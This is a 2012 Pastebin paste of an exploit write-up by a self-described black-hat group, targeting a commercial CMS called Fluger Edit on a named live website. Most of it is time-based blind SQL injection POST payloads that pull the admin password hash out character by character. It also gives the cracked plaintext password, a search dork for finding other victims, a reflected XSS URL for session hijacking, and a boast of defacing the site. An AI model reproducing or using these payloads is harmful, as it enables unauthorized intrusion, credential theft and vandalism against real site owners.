API tools faq
paste
Advertisement
Guest User

0day for fucked fluger arm bitch studio

a guest
Sep 3rd, 2012
386
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.23 KB | None | 0 0
raw download clone embed print report
  1. [red]0day for fucked fluger arm bitch studio[/red]
  2.  
  3.  
  4.  
  5. [code]
  6. =====================================================
  7. Vulnerable Software: Fluger Edit v.2 || administration software
  8. Vendor: http://www.fluger.com/
  9. Software License: Commercial
  10. Vulnerabilities: Blind SQL Injection And XSS
  11. Tested: In Wild
  12. =====================================================
  13.  
  14.  
  15. Dork :
  16. Designed and developed by Fluger IT
  17. All right reserved © | 2004 - 2012
  18.  
  19. ************** FOR OUR BRO RAMIL SEFEROV! ************************
  20. @OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
  21. I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
  22. ********************** REALLY! ********************************************
  23. ******************ENJOY MAXIMALLY**************************************
  24.  
  25.  
  26. ======================================================
  27. FULLY disclosured Real Exploitation examples:
  28. GPC MUST BE=OFF
  29.  
  30. Theris Blind SQLi vulnerability on login page:
  31.  
  32. http://www.artclima.am/edit/ <===(Admin panel)
  33.  
  34.  
  35. Vulnerable scenario is exist here: http://www.artclima.am/edit/config_secure/verify.php
  36.  
  37. (Sorry i have no access to source code)
  38.  
  39. CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png
  40.  
  41. Due authentication mechanism you can't bypass login form by sending:
  42. 'or''='
  43.  
  44. Instead of you can use Time Based Way to obtain logins:password from admin table.
  45. Here we go:
  46.  
  47. Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png
  48.  
  49.  
  50.  
  51.  
  52. http://www.artclima.am/edit/index.php?error
  53.  
  54.  
  55. Headers:
  56.  
  57. Host: www.artclima.am
  58. User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
  59. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  60. Accept-Language: en-us,en;q=0.5
  61. Accept-Encoding: gzip, deflate
  62. DNT: 1
  63. Connection: keep-alive
  64. Cookie: PHPSESSID=:$
  65. Content-Type: application/x-www-form-urlencoded
  66. Content-Length: 28
  67.  
  68.  
  69.  
  70. POST DATA:
  71.  
  72. username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  73.  
  74.  
  75. *REPLAY*
  76.  
  77.  
  78. loginde Blind varidir.
  79. Bypass getmir.
  80.  
  81. Time Based RuleZ!
  82.  
  83. www.artclima.am/edit/index.php?error
  84.  
  85. columnlar:
  86.  
  87. user
  88. password
  89.  
  90.  
  91. table: admin
  92.  
  93.  
  94.  
  95.  
  96. =========================================
  97.  
  98. 1 user var:
  99.  
  100. //TRUE
  101. username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir
  102.  
  103. cekek logini
  104.  
  105.  
  106. login: admin
  107.  
  108.  
  109. //TRUE
  110.  
  111. username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir
  112.  
  113.  
  114.  
  115. parolu cekek:
  116.  
  117.  
  118. =========================================
  119. 1-ci simvol: e
  120.  
  121. username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir
  122.  
  123. =========================================
  124.  
  125. 2-ci simvol: 0
  126.  
  127. username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  128.  
  129. =========================================
  130.  
  131. 3-cu simvol: 4
  132.  
  133. username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  134.  
  135. =========================================
  136.  
  137. 4-cu simvol: 4
  138.  
  139. username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  140.  
  141. =========================================
  142. 5-ci simvol: 6
  143.  
  144. username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  145.  
  146.  
  147. =========================================
  148. 6-ci simvol: 5
  149.  
  150. username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  151.  
  152. =========================================
  153. 7-ci simvol: 0
  154.  
  155. username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  156.  
  157. =========================================
  158. 8-ci simvol: a
  159.  
  160. username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  161.  
  162.  
  163. =========================================
  164. 9-cu simvol: 5
  165.  
  166. username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  167. =========================================
  168.  
  169. 10-cu simvol: 6
  170.  
  171. username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  172.  
  173. =========================================
  174.  
  175. 11-ci simvol: 7
  176.  
  177. username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  178.  
  179. =========================================
  180.  
  181. 12-ci simvol: e
  182.  
  183. username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  184.  
  185. =========================================
  186. 13-cu simvol: d
  187.  
  188. username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  189.  
  190. yoxla sonra
  191.  
  192. =========================================
  193. 14-cu simvol: 2
  194.  
  195. username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  196.  
  197.  
  198. =========================================
  199. 15-ci simvol: b
  200.  
  201.  
  202. username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  203.  
  204. =========================================
  205.  
  206. 16-ci simvol: 2
  207.  
  208. username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  209.  
  210. =========================================
  211.  
  212.  
  213. 17-ci simvol: d
  214.  
  215. username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  216. =========================================
  217. 18-ci simvol: 0
  218.  
  219. username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  220.  
  221. =========================================
  222.  
  223. 19-cu simvol: 4
  224.  
  225. username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  226.  
  227. =========================================
  228.  
  229. 20-ci simvol: 3
  230.  
  231. username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  232.  
  233. =========================================
  234. 21-ci simvol: 0
  235.  
  236. username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  237.  
  238.  
  239. =========================================
  240. 22-ci simvol: 3
  241.  
  242. username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  243. =========================================
  244.  
  245. 23-cu simvol: e
  246.  
  247. username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  248.  
  249. =========================================
  250. 24-cu simvol: 3
  251.  
  252. username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  253.  
  254. =========================================
  255.  
  256. 25-ci simvol: 7
  257.  
  258. username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  259.  
  260. =========================================
  261.  
  262. 26-ci simvol: 9
  263.  
  264. username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  265.  
  266. =========================================
  267.  
  268. 27-ci simvol: 3
  269.  
  270. username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  271.  
  272. =========================================
  273.  
  274. 28-ci simvol: d
  275.  
  276.  
  277. username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  278.  
  279. =========================================
  280. 29-cu simvol: f
  281.  
  282. username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  283.  
  284. =========================================
  285. 30-cu simvol: d
  286.  
  287. username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  288.  
  289. =========================================
  290. 31-ci simvol: 9
  291.  
  292. username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  293.  
  294.  
  295. =========================================
  296.  
  297. 32-ci simvol: 5
  298.  
  299. username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  300.  
  301. =========================================
  302.  
  303.  
  304. Verification: +
  305.  
  306.  
  307. //TRUE
  308. username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
  309.  
  310. MD5: e044650a567ed2b2d04303e3793dfd95
  311.  
  312. Resolves to: price777
  313.  
  314. Sure! I will "rm"-it too with great pleasure!
  315.  
  316. Rmned: http://zone-h.org/mirror/id/18295382
  317.  
  318.  
  319.  
  320.  
  321.  
  322. Second way: Session Hijack to gain access to admin panel:
  323.  
  324. XSS:
  325. http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1
  326.  
  327.  
  328. Print Screen:
  329. http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png
  330.  
  331.  
  332.  
  333.  
  334.  
  335. From source code of page:
  336.  
  337.  
  338.  
  339.  
  340. <table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">
  341. <tr valign="top">
  342. <td class="bg_content">
  343. <div id="printarea">
  344. <table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">
  345. <tr>
  346. <td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>
  347. <td>&nbsp;</td>
  348. </tr>
  349. </table>
  350. <table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >
  351.  
  352.  
  353.  
  354. ==========================THE END=========================
  355.  
  356.  
  357.  
  358.  
  359.  
  360.  
  361. SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
  362. ===========================================================
  363. packetstormsecurity.org
  364. packetstormsecurity.com
  365. packetstormsecurity.net
  366. securityfocus.com
  367. cxsecurity.com
  368. security.nnov.ru
  369. securtiyvulns.com
  370. securitylab.ru
  371. secunia.com
  372. securityhome.eu
  373. exploitsdownload.com
  374. exploit-db.com
  375. to all AA Team + to all Azerbaijan Black HatZ +
  376. *Especially to my bro CAMOUFL4G3.*
  377. ===========================================================
  378.  
  379. /AkaStep
  380.  
  381.  
  382. 02.09.2012
  383.  
  384.  
  385.  
  386.  
  387. [/code]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!